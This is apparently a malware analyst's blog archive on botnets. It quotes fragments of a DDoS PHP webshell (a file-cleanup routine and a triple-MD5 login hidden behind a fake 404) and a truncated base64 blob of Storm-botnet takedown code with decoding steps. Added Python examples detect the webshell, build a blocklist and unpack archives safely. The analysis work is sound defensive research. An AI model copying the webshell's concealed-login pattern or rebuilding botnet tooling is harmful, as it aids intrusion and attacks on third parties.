Posts Tagged ‘botnet’

DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack on US banks.
The PHP script involved showed a “404” error when called without any
arguments.

A closer look shows a “404 Not Foun derror”, WITH the typo in it.
Now we have a neat string to search for in Google or wherever..
and bingo: some other victim had already posted the source code
from the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()   // sic: the misspelling is in the original script
{
@unlink($base."stmdu.php");   // remove the dropped helper files
@unlink($base."stp.hp");      // sic: ".hp", also as in the original
cmdexec("killall ping;");     // kill the flooding ping processes
print "Stop & Clean";
}

And here is where the typo sits:


// Login check: md5(md5(md5($_REQUEST['pass']))) must equal the stored
// hash $pass_up, or the session must already be flagged as logged in.
// Everybody else gets this fake 404 page (no header() call is visible
// here, so it most likely goes out with a normal 200 status).
if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();   // never reached: die() is an alias of exit()
}
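The fake 404 page gives a fingerprint, and the login check gives a hash recipe. Below is an added example (not code from the post or from the PHP script) that turns both into something an analyst can run: a classifier that flags fetched pages carrying the typo, flags "404" text served with a 200 status as a lead (an assumption taken from the quoted snippet, which prints its page without a visible header() call), and a triple-MD5 helper to test candidate passwords against a $pass_up value recovered from a sample. The sample responses and host names are constructed for the example.

```python
import hashlib
import re

# Constructed fingerprint: the misspelt error text the post found in the
# script's fake 404 page. The regex tolerates whitespace and tag boundaries
# that an HTML-rendered or copy-pasted page may introduce.
FINGERPRINT = re.compile(r"404\s+Not\s+Foun\s*derror", re.IGNORECASE)


def is_ddos_script_page(body: str) -> bool:
    """True if the response body carries the typo from the quoted script."""
    return FINGERPRINT.search(body) is not None


def classify(status: int, body: str) -> str:
    """Verdict for one fetched page.

    'ddos-script': the typo is present, this is the quoted PHP script.
    'fake-404'   : error text but a 200 status. Assumption: the quoted
                   snippet prints its page with no header() call, so it
                   answers 200. Other scripts do the same, so only a lead.
    'clean'      : nothing suspicious.
    """
    if is_ddos_script_page(body):
        return "ddos-script"
    if status == 200 and re.search(r"404\s+Not\s+Found", body, re.IGNORECASE):
        return "fake-404"
    return "clean"


def scan(responses):
    """responses: iterable of (url, status, body) that were already fetched.
    Returns {url: verdict} for everything that is not 'clean'."""
    return {url: v for url, status, body in responses
            if (v := classify(status, body)) != "clean"}


def triple_md5(password: str) -> str:
    """md5(md5(md5($pass))) as the quoted login check computes it: PHP's
    md5() returns lowercase hex and the outer calls hash that hex string."""
    h = password
    for _ in range(3):
        h = hashlib.md5(h.encode()).hexdigest()
    return h


def matches_pass_up(candidate: str, pass_up: str) -> bool:
    """Does a candidate password unlock a sample whose $pass_up is known?"""
    return triple_md5(candidate) == pass_up.lower()


# Constructed sample responses (not real hosts): the script's fake 404,
# a genuine Apache 404 and an ordinary page.
SAMPLE_RESPONSES = [
    ("http://victim.example/img/stmdu.php", 200,
     "404 Not Found\nNot Found\nThe requested URL /img/stmdu.php was not "
     "found on this server\nAdditionally, a 404 Not Foun derror was "
     "encountered while trying to use an Error Document to handle the request"),
    ("http://ok.example/missing", 404,
     "<h1>Not Found</h1><p>The requested URL /missing was not found on this "
     "server.</p><p>Additionally, a 404 Not Found error was encountered "
     "while trying to use an ErrorDocument to handle the request.</p>"),
    ("http://ok.example/", 200, "<h1>Welcome</h1>"),
]

if __name__ == "__main__":
    for url, verdict in scan(SAMPLE_RESPONSES).items():
        print(f"{verdict:12} {url}")
```

Feed scan() whatever your crawler or proxy log gives you; the genuine Apache page in the sample shows why the regex insists on "Foun derror" rather than "Found error", otherwise every real 404 with an ErrorDocument problem would match.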

 

 

good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

Ghost Click: Botnet busted

Thursday, November 10th, 2011

The FBI announced the arrest of six Estonian nationals for creating the world's biggest botnet so far (DNSChanger):
FBI Announcement

The German magazine Heise also published an article about it:
Heise-Link

C&C – honeypot

Thursday, November 4th, 2010

Now the criminals run honeypots too:


http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/

Don’t trust the admin interface of a Malware Control Server..:-)

own rbl started

Saturday, May 8th, 2010

I finally managed to create my own RBL (realtime blocklist) fed by my honeypot.
All verified IPs which successfully attacked the honeypot are put into a database, which
provides an RBL for our MXes. The IPs are held for 24 hours except those which have more than 50
successful attacks within the last day. I was wondering if there were any mail hits to be seen
at all; at least these are totally different attack vectors. But strangely enough I could see
blocked emails because of the entries made by the honeypot. We will see how well this
performs.
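As an added example (not the author's code), here is the listing policy from the post in Python: every IP with a verified successful attack is listed for 24 hours after its last hit, and an IP with more than 50 hits inside any 24-hour window is kept longer. The post does not say how much longer, so the seven-day heavy hold is an assumption; the zone name rbl.example. and the honeypot log are constructed for the example. The output is the DNSBL convention an MX queries: the IP's octets reversed under the list's zone, answered with 127.0.0.2.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
import ipaddress

HOLD = timedelta(hours=24)          # from the post: entries live 24 hours
HEAVY_THRESHOLD = 50                # from the post: "more than 50" hits in a day
HEAVY_HOLD = timedelta(days=7)      # assumption: the post does not say how long heavy hitters stay


def max_hits_in_window(times, window=HOLD):
    """Largest number of attacks from one IP inside any sliding window."""
    times = sorted(times)
    best, j = 0, 0
    for i, t in enumerate(times):
        while t - times[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def entry_expiry(times):
    """(expiry time, is_heavy) for one IP's attack timestamps."""
    heavy = max_hits_in_window(times) > HEAVY_THRESHOLD
    return max(times) + (HEAVY_HOLD if heavy else HOLD), heavy


def listed(attacks, now):
    """attacks: iterable of (ip, UTC datetime) for verified successful
    honeypot attacks. Returns {ip: (expiry, is_heavy)} for the IPs the
    RBL should answer for at `now`."""
    by_ip = defaultdict(list)
    for ip, ts in attacks:
        if ts <= now:                       # ignore clock-skewed future records
            by_ip[ip].append(ts)
    out = {}
    for ip, times in by_ip.items():
        exp, heavy = entry_expiry(times)
        if now < exp:
            out[ip] = (exp, heavy)
    return out


def dnsbl_name(ip, zone):
    """DNSBL convention: reversed octets under the list's zone, so an MX
    asks for 10.2.0.192.rbl.example. to check 192.0.2.10."""
    octets = ipaddress.IPv4Address(ip).exploded.split(".")
    return ".".join(reversed(octets)) + "." + zone


def zone_records(entries, zone="rbl.example.", ttl=300):
    """Zone-file lines (A 127.0.0.2 plus a TXT reason) for the listed IPs.
    The zone name is an assumption; use your own."""
    lines = []
    for ip, (exp, heavy) in sorted(entries.items(),
                                   key=lambda kv: ipaddress.IPv4Address(kv[0])):
        name = dnsbl_name(ip, zone)
        why = "heavy hitter" if heavy else "honeypot hit"
        lines.append(f"{name} {ttl} IN A 127.0.0.2")
        lines.append(f'{name} {ttl} IN TXT "{why}, listed until {exp:%Y-%m-%dT%H:%MZ}"')
    return lines


NOW = datetime(2010, 5, 8, 12, 0, tzinfo=timezone.utc)


def sample_attacks():
    """Constructed honeypot log, not real data."""
    recs = [("10.0.0.1", NOW - timedelta(hours=1)),     # one fresh hit
            ("10.0.0.2", NOW - timedelta(hours=30))]    # one hit, older than 24h
    start = NOW - timedelta(days=3)                     # 60 hits in one hour, 3 days ago
    recs += [("10.0.0.3", start + timedelta(minutes=i)) for i in range(60)]
    return recs


if __name__ == "__main__":
    print("\n".join(zone_records(listed(sample_attacks(), NOW))))
```

Run against the constructed log, 10.0.0.2 has aged out, 10.0.0.1 is listed until an hour short of tomorrow, and 10.0.0.3 stays for the long hold although its burst was three days ago. Keep the TTL short: the MX caches the answer, so a long TTL effectively extends every listing.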

torpig powned

Tuesday, May 5th, 2009

According to a recent article on Heise some scientists have
taken over the torpig botnet for 10 days. The original article can
be found here.

Stormfucker

Saturday, January 10th, 2009

Recently a team of scientists posted an article about dealing with the Storm botnet.
leder_at_informatik.uni-bonn.de posted some parts of the source code “stormfucker” on the mailing list “Full Disclosure”.
Here is the alpha code for Stormfucker. Patched a few things to not make
it work out of the box.

QlpoOTFBWSZTWZCbNyYBVlN/////////////////////////////////////////////4TAs912+
+94tbufA4+gD77BpzqdxS0zeLwUezfXsV0ddu49dtzvgHvsHnnnp3c5BjtTPM71fcjZuzwHo94vu
Dop5AABQAD77B7ym3y7vALrmz7Q8AVtsgAAeSc3PAd9j7469igoDHgOdgBQA+jR87AAADe5n0gvn...

If you want to work with this code, you need to decode the source first. Here is how to do it
with Python:

1) save the source in a file
2) start python:
$ python
Python 2.5.1 (r251:54863, May 18 2007, 16:56:43)
[GCC 3.4.4 (cygming special, gdc 0.12, using dmd 0.125)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import *
>>> a=file("stf.txt",'r')
>>> b=a.read()
>>> c=b64decode(b)
>>> a=file("stf.out",'w')
>>> a.write(c)
>>> a.close()
^D

Now we have an stf.out file, which is bzip2 compressed (check with "file"):
$ bzip2 -d stf.out
bzip2: Can't guess original name for stf.out -- using stf.out.out

Now we have a tar file.. let's have a look:

$ tar tvf stf.out.out
drwxr-xr-x tw/tw 0 2008-01-01 00:00 stormfucker/
-rw-r--r-- tw/tw 610 2008-01-01 00:00 stormfucker/routing.h
-rw-r--r-- tw/tw 75 2008-01-01 00:00 stormfucker/install.h
..

Extract with tar xvf and have phun..:)
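The three steps above (base64 decode, bzip2 decompress, tar listing) in one Python 3 script, as an added example and not the post's own session. Since the archive is untrusted code from a mailing list, the script also refuses to extract tar members that would escape the target directory (absolute names, ".." components, links and devices), a check the plain tar xvf in the post does not do. The posted blob is truncated here, so the example builds a constructed stand-in archive with the same two file names the listing shows; it is not the real Stormfucker source.

```python
import base64
import bz2
import io
import tarfile


def decode_blob(text: str) -> bytes:
    """Base64 text (line breaks and whitespace tolerated) -> raw bytes."""
    return base64.b64decode("".join(text.split()))


def is_bzip2(data: bytes) -> bool:
    """Same test `file` applies: a bzip2 stream starts with 'BZh' and a
    block-size digit 1-9."""
    return len(data) >= 4 and data[:3] == b"BZh" and data[3:4] in b"123456789"


def safe_members(tar: tarfile.TarFile):
    """Yield only plain files and directories with relative names; refuse
    anything that could write outside the extraction directory."""
    for m in tar.getmembers():
        parts = m.name.split("/")
        if (m.name.startswith("/") or "\\" in m.name or ".." in parts
                or not (m.isfile() or m.isdir())):
            raise ValueError(f"refusing tar member {m.name!r}")
        yield m


def unpack(text: str, dest=None):
    """Decode, decompress and list the archive; extract into `dest` if given.
    Returns the member names in archive order."""
    raw = decode_blob(text)
    if not is_bzip2(raw):
        raise ValueError("decoded data is not a bzip2 stream")
    tar_bytes = bz2.decompress(raw)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        members = list(safe_members(tar))
        if dest is not None:
            kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
            tar.extractall(dest, members=members, **kwargs)
        return [m.name for m in members]


def blob_is_safe(text: str) -> bool:
    """True if the blob decodes cleanly and every member passes safe_members()."""
    try:
        unpack(text)
        return True
    except ValueError:
        return False


# Constructed stand-in for the posted blob (which is truncated above): a
# tiny tar with the two file names from the post's listing, bzip2-compressed
# and base64-encoded. Not the real archive.
SAMPLE_ENTRIES = (("stormfucker/routing.h", b"/* routing, placeholder */\n"),
                  ("stormfucker/install.h", b"/* install, placeholder */\n"))


def build_sample_blob(entries=SAMPLE_ENTRIES) -> str:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, body in entries:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return base64.encodebytes(bz2.compress(buf.getvalue())).decode()


if __name__ == "__main__":
    for name in unpack(build_sample_blob()):
        print(name)
```

To run it on the real blob, pass the saved text of stf.txt to unpack() with a dest directory. A member named "../something" or "/etc/something" makes unpack() raise instead of extracting, which is exactly the case where "have phun" would otherwise mean overwriting files outside the working directory.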